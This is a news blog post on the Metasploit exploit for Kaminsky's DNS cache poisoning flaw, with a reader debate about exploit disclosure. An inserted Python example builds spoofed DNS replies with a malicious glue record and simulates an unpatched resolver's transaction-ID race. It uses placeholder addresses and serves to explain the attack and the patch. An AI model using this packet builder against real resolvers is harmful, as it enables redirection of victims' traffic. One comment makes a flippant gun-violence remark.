Attack code published for DNS flaw

Exploit posted for DNS cache poisoning vulnerability

The urgency to patch Dan Kaminsky's DNS cache poisoning vulnerability just went up a few notches.

Exploit code for the flaw, which allows the insertion of malicious DNS records into the cache of the target nameserver, has been added to Metasploit, a freely distributed attack/pen-testing tool.

According to Metasploit creator HD Moore, who teamed up with researcher |)ruid to create the exploit, a DNS service has also been created to assist with the exploit.

[ SEE: Vulnerability disclosure gone awry: Understanding the DNS debacle ]

The code, available here, takes aim at known deficiencies in the DNS protocol and common DNS implementations that aid in serious cache poisoning attacks.

This exploit caches a single malicious host entry into the target nameserver. By causing the target nameserver to query for random hostnames at the target domain, the attacker can spoof a response to the target server including an answer for the query, an authority server record, and an additional record for that server, causing the target nameserver to insert the additional record into the cache.
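The mechanism in the paragraph above, worked through as an added example (this is not the Metasploit module's code and not from the original post). It builds the spoofed reply in DNS wire format, parses it back the way a resolver would, and applies the pre-patch bailiwick rule that decides which records from the reply get cached. The zone `example.com`, the nameserver `ns1.example.com`, the attacker address `203.0.113.7`, the throwaway answer `192.0.2.1` and the one-day TTL are all constructed for illustration; `poison_attempt` models one round of the race with a resolver that uses a fixed source port, so the attacker only has to guess a 16-bit transaction ID.

```python
"""Added example: a Kaminsky-style spoofed DNS reply and the resolver-side
acceptance rule that lets its glue record into the cache. All names and
addresses below are constructed for illustration."""
import random
import struct

QTYPE_A, QTYPE_NS = 1, 2
CLASS_IN = 1


def encode_name(name):
    """Encode a dotted hostname into DNS wire format (no label compression)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += struct.pack("B", len(label)) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, offset):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels, jumped, end = [], False, None
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # compression pointer into the message
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def rr(name, rtype, ttl, rdata):
    """One resource record: NAME, TYPE, CLASS, TTL, RDLENGTH, RDATA."""
    return encode_name(name) + struct.pack("!HHIH", rtype, CLASS_IN, ttl, len(rdata)) + rdata


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def build_poison_response(txid, qname, zone, ns_name, ns_ip, ttl=86400):
    """Spoofed reply to a query for a random hostname under `zone`: an answer
    for the query itself (its content is irrelevant), an authority NS record
    delegating `zone` to `ns_name`, and an additional A record gluing `ns_name`
    to the attacker's address. The attacker also picks the TTL."""
    flags = 0x8400  # QR=1 (response), AA=1 (authoritative answer), RCODE=0
    header = struct.pack("!HHHHHH", txid, flags, 1, 1, 1, 1)
    question = encode_name(qname) + struct.pack("!HH", QTYPE_A, CLASS_IN)
    answer = rr(qname, QTYPE_A, ttl, ip_bytes("192.0.2.1"))      # constructed
    authority = rr(zone, QTYPE_NS, ttl, encode_name(ns_name))
    additional = rr(ns_name, QTYPE_A, ttl, ip_bytes(ns_ip))
    return header + question + answer + authority + additional


def parse_response(data):
    """Parse header, question and the three record sections of a reply."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    offset = 12
    qname, offset = decode_name(data, offset)
    qtype, qclass = struct.unpack("!HH", data[offset:offset + 4])
    offset += 4
    sections = {}
    for key, count in (("answer", an), ("authority", ns), ("additional", ar)):
        records = []
        for _ in range(count):
            name, offset = decode_name(data, offset)
            rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
            offset += 10
            rdata = data[offset:offset + rdlen]
            offset += rdlen
            if rtype == QTYPE_A:
                value = ".".join(str(b) for b in rdata)
            elif rtype == QTYPE_NS:
                value, _ = decode_name(data, offset - rdlen)
            else:
                value = rdata
            records.append((name, rtype, ttl, value))
        sections[key] = records
    return {"txid": txid, "flags": flags, "question": (qname, qtype), **sections}


def in_bailiwick(name, zone):
    """Bailiwick rule: a record from this reply is cacheable only if its owner
    name is the zone being asked about or lies beneath it. The glue for
    ns1.example.com passes when the question was about <random>.example.com."""
    name, zone = name.lower().rstrip("."), zone.lower().rstrip(".")
    return name == zone or name.endswith("." + zone)


def resolver_accepts(reply, expected_txid, expected_qname, zone):
    """Model an unpatched resolver: a reply is taken if the 16-bit transaction
    ID and the question match its outstanding query; every in-bailiwick
    record, the glue included, then goes into the cache."""
    parsed = parse_response(reply)
    if parsed["txid"] != expected_txid or parsed["question"][0] != expected_qname:
        return []  # wrong guess: silently dropped, the attacker just keeps sending
    return [(name, rtype, value)
            for section in ("answer", "authority", "additional")
            for name, rtype, ttl, value in parsed[section]
            if in_bailiwick(name, zone)]


def poison_attempt(seed, zone="example.com", ns_name="ns1.example.com",
                   attacker_ip="203.0.113.7", guesses=200):
    """One round of the race with a fixed source port: the resolver picks a
    TXID for its query about a random hostname, the attacker floods `guesses`
    spoofed replies with different TXIDs before the real answer arrives.
    Returns the records that got cached if a guess hit, else None; a miss
    costs nothing, the attacker asks for another random hostname and retries."""
    rng = random.Random(seed)
    qname = "%08x.%s" % (rng.getrandbits(32), zone)
    resolver_txid = rng.getrandbits(16)
    for txid in rng.sample(range(65536), guesses):
        reply = build_poison_response(txid, qname, zone, ns_name, attacker_ip)
        cached = resolver_accepts(reply, resolver_txid, qname, zone)
        if cached:
            return cached
    return None
```

Two things the code makes concrete. First, the cached payload is not the answer for the random name but the additional record: once `ns1.example.com` resolves to the attacker's address for the attacker-chosen TTL, every later lookup under `example.com` goes to the attacker. Second, the random-hostname trick means a lost round has no cost, so the only defence left on an unpatched resolver is the 16-bit transaction ID; with `guesses=65536` a single round is guaranteed to land. The vendor patches added source-port randomization, which puts the port's entropy on top of the transaction ID and turns a race that takes seconds or minutes into one that takes far longer.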

In an IM exchange, Moore told me his exploit takes about a minute or two to poison a DNS cache but said he is working to improve it in version 2.0.

Kaminsky is on record as saying it is possible to launch a successful attack in a matter of seconds.

Patch now! Please.

  • Irresponsible and evil

    "In an IM exchange, Moore told me his exploit takes about a minute or two to poison a DNS cache but said he is working to improve it in version 2.0."

    As far as I am concerned he is just an evil person to do what he did. What positive will come of this? People getting ripped off with his help by making a "Better, Faster Program" to exploit the bug. I just don't see how this is not a criminal act?
    • Quote: "What positive will come of this?"

      This exploit was not rocket science and the articles published leading up to Dan Kaminsky's appearance provided enough data for most knowledgeable hackers to exploit it.

      Now back to "What positive will come of this?":
      The blackhats already have this exploit in the wild, no two ways about it. So what positive will come out of the Metasploit DNS exploit is that you as a security officer or systems admin can get the Metasploit Framework, compile it for yourself and see how exposed you are to the issue before someone else with more nefarious plans does the same.

      If you are so naive that you think that this isn't already out in the wild then might I suggest a career change such as "Would you like some fries with that order?"
      • Assumption

        Ya know what they say, assumption is the mother of all F$#k ups. You assume that I work in the IT profession, I don't, I am just a normal computer user who likes to read tech news. Stop making excuses for people that do stupid things, like releasing exploit code before people have the time to fix and patch the code.

        I stand by my comment as nothing you have said is a good reason for what he did. Nothing good will come of the stupid exploit release, unless they're black-hat criminals.
        • And yet, you assume...

          >> Ya know what they say,assumption is the
          >> mother of all F$#k ups.

          And yet, you assume something to be evil, in an industry in which you have no formal education.

          I for one find this useful as the exploit will help a sysadmin find holes in his system in no time. Without such a toolkit, it is almost impossible to know what needs to be patched.

          This exploit was certainly in existence among the true bad guys, or something close by it, as soon as it was disclosed a major DNS vulnerability existed, perhaps even before the announcement.

          We who make a living as IT professionals are always on the catch-up with the bad guys. That's the nature of this complex business. Toolkits like this help in the catching up by early identification of vulnerabilities.

          Also saying that you stand by your original opinion does not mean anything. Opinions are not fact, but just that, opinions. Yours is subjective and uneducated.

          You are certainly entitled to it as it is your right. It does not make it a valid one, however. You are not an IT professional, and certainly not a sysadmin or IT security expert. As much right as you have to voice your opinion, it is useless and mistaken in this particular context regardless of how proudly you stand on a soapbox proclaiming that you stand by it.
          • hmmmm....

            "This exploit was certainly in existence among the true bad guys, or something close by it, as soon as it was disclosed a major DNS vulnerability existed, perhaps even before the announcement."

            as soon as - wow, they're that fast at coding, and finding the exact exploit. I'd say a few days (at most), but before or as soon as would be a lot more likely. Yes the bad guys are innovative, but that doesn't mean that they have these plots before we figure them out, just before we figure out how to defend against them. The good guys are just in a constant race condition with the bad guys, sometimes we make it, sometimes they make it. No guarantee either way.

            Now, as far as your arrogant and annoying dismissal because stan57 is not an IT professional, that's just disheartening. You fail to appreciate that perception is reality; if the general public begins to think that this type of behavior is irresponsible, no matter how often it happens or doesn't happen, they are the ones that matter. Remember, your jobs exist only because PEOPLE need them to exist.
            His opinion may be mistaken, easy to do not being an IT professional, but useless it is not.

            You're right, opinions are just that, opinions and his, while uneducated didn't attack you in any way, shape or form. Your opinion, is also subjective, however it's also condescending, rude and arrogant.

            "We who make a living as IT professionals are always on the catch-up with the bad guys. That's the nature of this complex business."
            This is just pompous.
            "The it security industry is a rapidly changing landscape, which can be hard to keep up with, that's why I appreciate a toolkit like X provided for this bug."
            A lot less confrontational, elitist, and alienating way to speak with people. No wonder us computer geeks have a bad image, too many of us lack "da' social skills."
        • Assumption (of your own)

          OK Stan57, I AM a computer security professional, and I don't have time to learn how to try all the new exploits, so I rely on MetaSploit to test, and MORE IMPORTANTLY, to prove to management and developers that these type of things CAN be hacked... that they are NOT hypothetical. That's often the only thing that gets traction to get them to fix the flaws and weaknesses. And I know many others in my field who do the same as I, so it's not just me!
          Anonymous InfoSec dude,
          with CISSP and GCFA
    • wrong

      Perhaps the question is rather: "Why should this be illegal?". Just because something can be used for "EVIL" doesn't mean it should be outlawed.
    • RE: Irresponsible and evil

      So, your solution is to shoot the messenger? Or, is it to make sure that the privileged get the info first and everyone later, if at all? Are you someone's lackey?

      I, for one, am glad the exploit was published. First, that will destroy any perceived buffer time that could justify procrastination by those offering money related services (and this is all about money) so they can protect their bottom line. Microsoft uses this approach and we all know the results of that policy --- millions of Windows users have had their personal info stolen and abused. Secondly, it gives me the opportunity to evaluate for myself the criticality of this exploit. In my case, I do not plan to access my online bank account, nor Amazon, nor my phone company's site, etc..., until I am sure this hack is fixed. When vendors like Amazon start noticing a drop in business you can be sure they will put on the heat where it needs to be applied.

      Daniel Bernstein published a critique of the DNS about five years ago. Daniel Kaminsky probably just read it and decided to exploit it for publicity. Who knows? Maybe this will finally lead to TCP/IP 2.0 and a more secure IP packet design.
      • pad time...

        Not sure of the exact numbers, but pad time was added to the 30 day buffer zone most likely to ensure that any problems could have a little time to iron out. I find it hard to believe that this patch would be as simple as "Click to patch", no reboot, no possible server down time. I would imagine that this is a patch that the community needed some time to implement.

        Oh, and if the people that pay the most money get some of the details worked out a bit sooner, welcome to Capitalism - our world as we know it has prospered under it.
  • I can't think of ANYONE who deserves to be...

    ...on the wrong end of a Glock right about now.
    • Oh grow up cowboy! Ignorance is not bliss.

      Do you honestly think that this is the only copy of the exploit out there?
      At least with |)ruid's code you can compile it yourself and test your DNS.

      Have the blackhats that already have this exploit offered you that?
      • No, but keeping the script kiddies & uneducated but resourceful terrorist.

        in the dark, might be nice. Living by the sword, Kaminsky's showmanship brought out the showman in others. Either trying to steal some of his thunder, or in this case, just grabbing on for the ride. I don't doubt there are a few dozen that have worked this exploit already. But there are hundreds of blackhearts that have the desire but not the skills. This is comparable to dumping a bunch of loaded handguns in the monkey cage at the zoo. Someone's going to be hurt.
        • Godwins Law, but now on terrorists?

          You just killed your argument. What terrorists are knowledgeable on computer security?! Stop repeating scare-mongering propaganda, please.

          • Publish just 2 days & the attacks are on. Maybe I was right, hmmm?

            Do you really believe there are no geek jihadis? How many terror recruitment sites are there? Heck, some Al-Jazeera's best reporting comes from tech-tard terrorists.

            I'll grant, there is a much higher chance these are script-kiddie criminals, and not the bring-on-the-apocalypse terrorist. But there is more than a fair chance these attackers are armed with Metasploit's published code.

            Egotism putting many of us at risk. So now someone will rush out some, not completely vetted fix. That may or may not leave our backsides exposed through some other avenue.
  • So What

    Ok so it's sort of dickish that HDM published this exploit, but guess what, this attack is already in the wild. Moore and |)ruid just have big ole brass balls for releasing this exploit code publicly.

    The fact is the cat is out of the bag, anyone with a modicum of skills can create a similar exploit in a couple hours or even less, and could have done so since at least three days ago when Halvar posted his initial conjecture (ok maybe 1-2 days if you are a pessimist/optimist).

    Regardless of what you think about that (I am pretty ambivalent about it, unless you think Halvar is smarter than every blackhat), there is no real harm in it.

    As I said, this exploit has already been seen in the wild, the code is out there, if anything this just further illustrates the need to patch your systems. People who are going to exploit this are either already doing so or are preparing to do so very shortly, and with the money at stake for successfully exploiting this you can bet they aren't waiting around for some public exploit code to be released when it's so easy to roll their own.

    P.S. Ryan, stop being such a hate monger about this and making it look like the security community is full of petty infighting. Tom apologized for his (I believe) honest mistake. Matasano isn't exactly a no-name outfit trying to garner publicity for themselves. I'm sure Kaminsky is pretty upset, to put it mildly, but in the end mistakes happen, let's all grow up. Hell, I could even defend Halvar talking about the bug by saying that security through obscurity ain't the best. This just sped up people's patch cycles a bit, it's not the end of the world.
    • AGREED, and it gives you test code....

      to test your systems with before the exploits in the wild do it for you.

      I feel bad for Dan Kaminsky as this kind of "rains on his parade" when it comes to his presentation.

      But the fact of the matter is that it was already making the rounds before HD and Metasploit published it.
    • true but,

      if you've followed the entire story there was a very coordinated effort by a majority of affected systems. Had the community swallowed its ego a bit and maybe conjectured in a very closed system - like maybe face to face. If Halvar hadn't needed to feed his ego it would have given a bit more of a chance to get as much patched. As much as I applaud blogs, there are situations where a person should learn to keep the proverbial cake hole shut.
      Follow the Hippocratic oath: do no harm. If you think that it's possible an exploit could be harmful - contact the company (duh statement). If it had been said there is a FIX ON THE WAY, then shut up and try doing something productive - posting conjectures that could very potentially speed up the exploit being implemented most of the time doesn't help - it just gives virus makers (script kiddies too) a brand new target - and there's a hell of a lot more of them than there are people working to fix the exploits in the first place.
      Yes mistakes happen, but these weren't just honest mistakes, they were ego getting in the way of common sense. And if we just let them off with "mistakes are made" then it will happen again. Nobody will say "Oh, there are serious consequences to my actions, I think I'll tell people about this exploit that causes the user to try and shove their nose in people's ears."
      The fact is that the people that openly made conjectures (a good thing in general) about something that was said to have a fix on the way, just because they had to know what it is. Sounds childish to me "I want to know, I want to know, I want to know!!!!!" <stomping feet on the ground>
      Growing up includes using some common sense, which should have convinced them to act more responsibly.
  • RE: Attack code published for DNS flaw

    Thanks for the information. Our organization is now doing the update. My fear now is with the Kaminsky's update now public, won't the bad guys find out how it's working and eventually find a way to circumvent it as this writer suggested? DNS Revolutions & Evolutions(
  • For those of you..

    Thinking that this exploit release is a bad thing.. think about how nice it would be for this to remain a silent exploit for.. say maybe China to redirect your DNS.. there.. feel better now?
    • Just plain dumb

      That doesn't make me feel any safer. Releasing exploit code to the wild before people have the time to patch their systems is just plain criminal. And if I was one of the people to get exploited because of this I would sue his butt into oblivion.

      I would love to see these people start to get sued for their irresponsible and criminal actions.